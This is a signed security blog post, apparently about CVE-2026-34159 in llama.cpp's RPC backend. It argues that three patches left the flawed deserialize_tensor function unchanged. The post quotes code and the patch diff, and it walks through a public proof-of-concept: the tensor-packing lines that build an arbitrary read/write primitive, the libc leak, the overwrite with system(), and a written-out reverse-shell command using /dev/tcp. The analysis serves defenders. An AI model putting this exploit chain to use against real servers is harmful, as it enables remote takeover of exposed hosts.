-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 NEFARIOUSPLAN-CANONICAL-V1 {"body_md":"## The 2024 fix is per-handler. The deserializer is not.\n\n`deserialize_tensor` lives in `ggml/src/ggml-rpc/ggml-rpc.cpp`. It is the single deserialization point for tensors that arrive on the RPC server's TCP socket. Its job is to read a wire-format `rpc_tensor` (296 bytes, fixed layout) and produce a `ggml_tensor` that the rest of the server can compute over.\n\nThe wire format includes a 64-bit `data` pointer and a 64-bit `buffer` pointer. The `buffer` pointer is a handle the client received from a previous `ALLOC_BUFFER` reply; the server expects to recognize it. The `data` pointer names the address inside that buffer where the tensor's elements live. Both fields are honest most of the time. The threat model is the case where they are not.\n\nThe 2024 fix's structure inside `deserialize_tensor`, verbatim from current `master`:\n\n```cpp\nresult->buffer = reinterpret_cast<ggml_backend_buffer_t>(tensor->buffer);\nif (result->buffer && buffers.find(result->buffer) == buffers.end()) {\n result->buffer = nullptr;\n}\n\nif (result->buffer) {\n // require that the tensor data does not go beyond the buffer end\n uint64_t tensor_size = (uint64_t) ggml_nbytes(result);\n uint64_t buffer_start = (uint64_t) ggml_backend_buffer_get_base(result->buffer);\n uint64_t buffer_size = (uint64_t) ggml_backend_buffer_get_size(result->buffer);\n GGML_ASSERT(tensor->data + tensor_size >= tensor->data);\n GGML_ASSERT(tensor->data >= buffer_start && tensor->data + tensor_size <= buffer_start + buffer_size);\n}\n\nresult->op = (ggml_op) tensor->op;\n...\nresult->data = reinterpret_cast<void *>(tensor->data);\n```\n\nThree behaviors. First: cast the wire's `buffer` field to a pointer. Second: if that pointer is non-null but is not in the server's `buffers` set, replace it with null. Third: only run the data-bounds check when `result->buffer` is set. The `data` field is then assigned unconditionally at the bottom of the function. 
A tensor with `buffer=0` (a null cast from the wire) reaches the assignment with no bounds enforcement, carrying whatever 64-bit value the network put in `tensor->data`.\n\nThe 2024 patch's defensive layer was outside this function. From the GHSA's \"Relation to prior CVEs\" section, written by the reporter:\n\n> All three share the same underlying bug: `deserialize_tensor()` does not validate `tensor->data` when `buffer=0`. The 2024 patches added bounds checks in the GET_TENSOR and SET_TENSOR command handlers, but the GRAPH_COMPUTE command takes a separate code path (`graph_compute()` -> `create_node()` -> `deserialize_tensor()`) that was never patched.\n\nThe 2024 fix was per-handler. `set_tensor` got its own bounds check. `get_tensor` got its own. `deserialize_tensor` got the partial check that runs only when the buffer field is verifiable. `create_node`, the entry point for `GRAPH_COMPUTE`, got nothing. From August 2024 to March 2026, an attacker who sent a tensor with `buffer=0` through `GRAPH_COMPUTE` was reaching code that had not been told the input might be hostile.\n\n## The wire format ships an arbitrary R/W primitive, and GRAPH_COMPUTE consumes it.\n\nHassan Ali's PoC at `casp3r0x0/CVE-2026-34159` is a single Python script under 350 lines, targeting llama.cpp build b8487. It opens a TCP connection to the RPC port, sends `RPC_CMD_HELLO` (command code 14), and starts allocating buffers. Two RPC commands are needed before the primitive:\n\n```python\nRPC_CMD_ALLOC_BUFFER = 0\nRPC_CMD_BUFFER_GET_BASE = 3\nRPC_CMD_SET_TENSOR = 6\nRPC_CMD_GET_TENSOR = 8\nRPC_CMD_GRAPH_COMPUTE = 10\n```\n\n`ALLOC_BUFFER` returns a `(remote_ptr, size)` pair where `remote_ptr` is a server-side `ggml_backend_buffer*`. `BUFFER_GET_BASE` resolves that handle to the buffer's actual data region. 
After two commands the client has a handle the server recognizes, so future bounds checks against this buffer pass, and the absolute address of its data region, so the client can compute offsets inside it.\n\nThe exploit primitive is one `GRAPH_COMPUTE` graph with two tensors:\n\n```python\nsrc = self._pack_tensor(0x3001, 0, target_addr, GGML_OP_NONE, [], n_elems)\ndst = self._pack_tensor(0x3002, remote_ptr, buffer_base, GGML_OP_CPY, [0x3001], n_elems, flags=16)\n```\n\nSource tensor: `buffer = 0`, `data = target_addr`. Inside `deserialize_tensor`, the buffer cast is null, the lookup branch is unreached, the bounds-check branch is skipped. The server returns a `ggml_tensor` whose `data` pointer is `target_addr`, the address the attacker named.\n\nDestination tensor: `buffer = remote_ptr` (the handle from `ALLOC_BUFFER`, which IS in the server's `buffers` set), `data = buffer_base` (the real address of the buffer's data region). The buffer is recognized, the bounds check runs, the destination passes honestly.\n\n`create_node` calls `deserialize_tensor` for both. Both return non-null. The pre-patch `if (result == nullptr)` accepts both. The graph is queued and executed. The CPY kernel performs `memcpy(buffer_base, target_addr, n_bytes)`. The server has just read from any address the attacker named and copied the bytes into a buffer the attacker can pull back with `GET_TENSOR`.\n\nThat is an arbitrary read in two RPC commands. Reversing source and destination yields an arbitrary write. Both primitives bypass the bounds check because the source tensor has `buffer=0` and the bounds check is conditional on the buffer field being verifiable.\n\nThe exploit chain after the primitives is conventional. 
The PoC reads the `iface.get_base` function pointer from the staging buffer's `ggml_backend_buffer` struct, scans backward in 4 KiB pages for the ELF magic to find `libggml-base.so`, reads the GOT slot for `memcpy` to leak libc, scans backward for libc's ELF magic, fetches libc's `.note.gnu.build-id`, queries libc.rip for `system()`'s offset by build-id, writes `bash -c \"bash -i>&/dev/tcp// 0>&1\"` and the resolved `system()` address into the staging buffer, and arbitrary-writes those 64 bytes over the staging buffer's own iface struct, replacing `iface->clear` with `system()`. Then the PoC sends `RPC_CMD_BUFFER_CLEAR`, which calls `iface->clear(buf)`. The reverse shell connects back.\n\nThe seven phases of the chain are bookkeeping. The primitive is: the RPC server will perform a `memcpy` from any address to any address on the network's request, repeatedly.\n\n## The 2026 fix is at the call site. The deserializer is unchanged.\n\nThe patch in commit `39bf0d3` is three lines:\n\n```diff\n struct ggml_tensor * result = deserialize_tensor(ctx, tensor);\n- if (result == nullptr) {\n+ if (result == nullptr || result->buffer == nullptr) {\n+ GGML_LOG_ERROR(\"[%s] invalid tensor: null %s (id=%\" PRIu64 \")\\n\",\n+ __func__, result == nullptr ? \"tensor\" : \"buffer\", id);\n return nullptr;\n }\n```\n\nThe change is in `create_node`, inside the `GRAPH_COMPUTE` handler. `deserialize_tensor` is not modified. The maintainer who merged it noted on the PR that \"tensor views within the compute graph are initialized through `ggml_backend_view_init()`, which includes assertions that prevent null buffer pointers in valid tensors. This validation makes the additional check sufficiently protective.\"\n\nThe 2026 patch follows the 2024 patch's shape. Each patch closes the specific call site that the specific CVE reached. `set_tensor` got its own bounds check in 2024. `get_tensor` got its own in 2024. `create_node` got its null check in 2026. 
The function they all call still returns tensors with null buffers and attacker-controlled `data` pointers.\n\nThe reviewer's reasoning is correct for the existing handlers. The bounds checks in `set_tensor` and `get_tensor` validate `tensor->data` directly against the buffer the wire claims. The `create_node` null check rejects null-buffer tensors before they reach a kernel. Together they cover the four RPC commands that pass tensors to dangerous code: `SET_TENSOR`, `GET_TENSOR`, `COPY_TENSOR`, `GRAPH_COMPUTE`. Any future RPC command that calls `deserialize_tensor` and uses `result->data` will need its own equivalent guard at its own call site. The contract of `deserialize_tensor` is still: return a struct whose pointers may be whatever the network said.\n\n## Three CVEs reach the same deserializer.\n\nCVE-2024-42478 (b3561, August 2024): \"The unsafe `data` pointer member in the `rpc_tensor` structure can cause arbitrary address reading.\" Reached through `GET_TENSOR`. Patched by adding a bounds check in `get_tensor`.\n\nCVE-2024-42479 (b3561, August 2024): \"The unsafe `data` pointer member in the `rpc_tensor` structure can cause arbitrary address writing.\" Reached through `SET_TENSOR`. Patched by adding a bounds check in `set_tensor`.\n\nCVE-2026-34159 (b8492, March 2026): \"The RPC backend's `deserialize_tensor()` skips all bounds validation when a tensor's buffer field is 0.\" Reached through `GRAPH_COMPUTE`. Patched by adding a null-buffer check in `create_node`.\n\nThree CVEs. Three fixes. Three different RPC handlers. One file. The deserialization function that produces the unsafe tensor in every path is the same in 2026 as it was before any of the three patches landed. From the reporter's own writeup of CVE-2026-34159, in the GHSA: \"All three share the same underlying bug: `deserialize_tensor()` does not validate `tensor->data` when `buffer=0`.\"\n\nThis is what [Design Debt Driver](/patterns/design-debt-driver) names. 
A component whose architecture produces the same bug class on a cadence, where each patch closes the specific instance and leaves the substrate intact. Tomcat's [`EncryptInterceptor`](/posts/tomcat-encryptinterceptor-fails-open) shipped two CVEs from the same `messageReceived` method this season, the second introduced by the patch for the first. llama.cpp's RPC backend produces them by handler: every command that takes a tensor on the wire is its own opportunity for the wire's data pointer to escape. Closing the symptom in three handlers does not change the deserializer's contract. The next handler that calls `deserialize_tensor` and uses `result->data` without a local guard reproduces the primitive.\n\nThe closer kin is [Unpatchable Primitive](/patterns/unpatchable-primitive). The RPC backend's job is to deserialize attacker-controlled tensor structures from the network and execute compute graphs over them. The structures contain pointers; the compute graphs run `memcpy`. Removing the primitive cleanly would mean rejecting every tensor whose `data` field cannot be proven to lie inside a known buffer, regardless of which call site reached the deserializer. That is a refactor of `deserialize_tensor`, not a guard at one of its consumers. Two CVE cycles have ended without that refactor.\n\n## What the advisory says, and what NVD does not.\n\nThe GHSA includes a \"Relation to prior CVEs\" section that names CVE-2024-42478, CVE-2024-42479, and the architectural fact that the GRAPH_COMPUTE path was never patched. The reporter, GitHub user `las7`, wrote that section himself and filed via CERT/CC on February 8, 2026. The advisory text says the three CVEs share one root cause.\n\nNVD's CVE-2026-34159 entry says the bug is missing bounds validation when `buffer=0` and that the patch is in version b8492. It does not link to the 2024 CVEs. The CWE assigned is CWE-119, the same CWE assigned to CVE-2024-42478 and CVE-2024-42479. 
A defender reading NVD sees a single CVE with a buffer-validation bug. A defender reading the GHSA sees the third CVE in a class that the reporter has named.\n\nThe 2024 fix that produced the partial bounds check inside `deserialize_tensor` also moved the RPC server's default bind address from `0.0.0.0` to `127.0.0.1` and added a runtime warning when the operator binds elsewhere. The README warns, in 2026 as in 2024, that the RPC backend is \"currently in a proof-of-concept development stage\" and that exposing the port is \"dangerous and should be avoided.\" The CVSS:3.1 vector on the new CVE is `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`: network-reachable, low complexity, no privileges, no interaction. The README's framing assumes operators who read warnings. The CVSS framing assumes operators who deploy the feature anyway. The 2024 default-bind change addressed the first audience. The exploit chain works against the second.\n\nPoC: [casp3r0x0/CVE-2026-34159](https://github.com/casp3r0x0/CVE-2026-34159)","closing_line":"Three CVEs reach the same deserializer. The three patches do not touch the deserializer.","hook_md":"The patch is three lines. The bug is in the function none of the three patches changed.\n\nIn August 2024, llama.cpp closed CVE-2024-42478 and CVE-2024-42479: arbitrary read and arbitrary write through the `data` pointer in the wire-format `rpc_tensor` struct. The 2024 fix added bounds checks in `set_tensor`, in `get_tensor`, and a conditional check inside `deserialize_tensor` itself. The conditional runs only when the tensor's `buffer` field matches a known server-side allocation. When the buffer field is null, the check is skipped and the function returns a tensor whose `data` pointer is whatever the network sent. The 2024 patches added bounds checks at the call sites that produced the original CVEs. They did not add one to the path that calls `deserialize_tensor` for `GRAPH_COMPUTE`. 
CVE-2026-34159 is the exploit that walks the unpatched call site and uses the server's own `memcpy` as an arbitrary read-and-write primitive.","post_id":47,"slug":"llama-cpp-cve-2026-34159-deserializer-three-cves-have-not-patched","title":"CVE-2026-34159: The Deserializer Three CVEs Have Not Patched","type":"initial","unreadable_sentence":"Three CVEs reach the same deserializer. The three patches do not touch the deserializer."} -----BEGIN PGP SIGNATURE----- iHUEARYIAB0WIQRf0htP5+SjynlxywneZjl4jgkQJgUCagYALQAKCRDeZjl4jgkQ JrtwAQDVlf/UGVw+iHkccCslnI7qoLaoUVlnW1uWJHtslughxgD8CaH1MSK7ltXc wBZ8zx9aQRM2Z2BwS0nOm6cq4zW/owQ= =zb3N -----END PGP SIGNATURE-----